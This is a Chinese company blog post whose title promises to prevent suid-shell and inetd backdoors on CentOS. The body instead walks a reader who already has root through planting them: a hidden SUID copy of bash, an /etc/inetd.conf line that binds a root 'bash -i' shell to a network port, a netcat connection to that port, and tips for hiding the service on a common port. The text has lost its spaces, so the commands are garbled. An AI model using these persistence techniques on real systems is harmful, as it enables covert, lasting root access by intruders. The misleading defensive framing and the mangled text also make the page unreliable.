成都网站建设设计

将想法与焦点和您一起共享

如何防止CentOS被suidshell与inetd后门利用-创新互联

本篇内容主要讲解“如何防止CentOS被suid shell与inetd后门利用”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习“如何防止CentOS被suid shell与inetd后门利用”吧!

成都网站建设、成都网站制作的开发,更需要了解用户,从用户角度来建设网站,获得较好的用户体验。成都创新互联公司多年互联网经验,见的多,沟通容易、能帮助客户提出的运营建议。作为成都一家网络公司,打造的就是网站建设产品直销的概念。选择成都创新互联公司,不只是建站,我们把建站作为产品,不断的更新、完善,让每位来访用户感受到浩方产品的价值服务。

你现在已经是root用户,想留一个后门。

如何防止CentOS被suid shell与inetd后门利用

系统环境:

dawg:~#uname-a

Linuxdawg2.4.20-1-386#3SatMar2212:11:40EST2003i686GNU/Linux

1.SUIDshell

首先,先切换成为root用户,并执行以下的命令:

dawg:~#cp/bin/bash/.wootdawg:~#chmod4755/.wootdawg:~#ls-al/.woot-rwsr-xr-x1rootroot690668Jul2417:14/.woot

当然,你也可以起其他更具备隐藏性的名字,我想猥琐并机智的你,肯定能想出很多好的名字的。文件前面的那一点也不是必要的,只是为了隐藏文件(在文件名的最前面加上“.”,就可以在任意文件目录下进行隐藏).

现在,做为一个普通用户,我们来启用这个后门:

fw@dawg:~$iduid=1000(fw)gid=1000(fw)groups=1000(fw)fw@dawg:~$/.woot.woot-2.05b$iduid=1000(fw)gid=1000(fw)groups=1000(fw).woot-2.05b$

为什么不行呢?

因为bash3针对suid有一些护卫的措施.但这也不是不可破的:

.woot-2.05b$/.woot-p

.woot-2.05b#id

uid=1000(fw)gid=1000(fw)euid=0(root)groups=1000(fw)

使用-p参数来获取一个rootshell.这个euid的意思是effectiveuserid(关于这些ID的知识,可以戳这里)

这里要特别注意的是,作为一个普通用户执行这个SUIDshell时,一定要使用全路径。

小知识:

如何查找那些具有SUID的文件:

dawg:~#find/-perm+4000-ls

这时就会返回具有SUID位的文件啦。

2.远程后门:利用/etc/inetd.conf

我们使用vi来修改/etc/inetd.conf文件

原文件:

#chargendgramudpwaitrootinternal

#discardstreamtcpnowaitrootinternal

#discarddgramudpwaitrootinternal

#daytimestreamtcpnowaitrootinternal

修改为:

#discardstreamtcpnowaitrootinternal

#discarddgramudpwaitrootinternal

daytimestreamtcpnowaitroot/bin/bashbash-i

开启inetd:

dawg:~#inetd

如果要强制重启inetd:

dawg:~#ps-ef|grepinetdroot36210Jul22?00:00:00/usr/sbin/inetdroot1376913643017:51pts/100:00:00grepinetddawg:~#kill-HUP362

现在我们就可以用nc来爆菊了:

C:tools192.168.1.77:inversehostlookupfailed:h_errno11004:NO_DATA

(UNKNOWN)[192.168.1.77]13(daytime)open

bash:nojobcontrolinthisshell

bash-2.05b#bash-2.05b#

bash-2.05b#iduid=0(root)

gid=0(root)groups=0(root)bash-2.05b#uname-a

Linuxdawg2.4.20-1-386#3SatMar2212:11:40EST2003i686GNU/Linux

小贴士:

我们可以修改/etc/services文件,加入以下的东西:

woot6666/tcp#evilbackdoorservice

然后修改/etc/inetd.conf:

wootstreamtcpnowaitroot/bin/bashbash-i

我们可以修改成一些常见的端口,以实现隐藏。

到此,相信大家对“如何防止CentOS被suid shell与inetd后门利用”有了更深的了解,不妨来实际操作一番吧!这里是创新互联建站,更多相关内容可以进入相关频道进行查询,关注我们,继续学习!


网站题目:如何防止CentOS被suidshell与inetd后门利用-创新互联
标题URL:http://chengdu.cdxwcx.cn/article/djeeec.html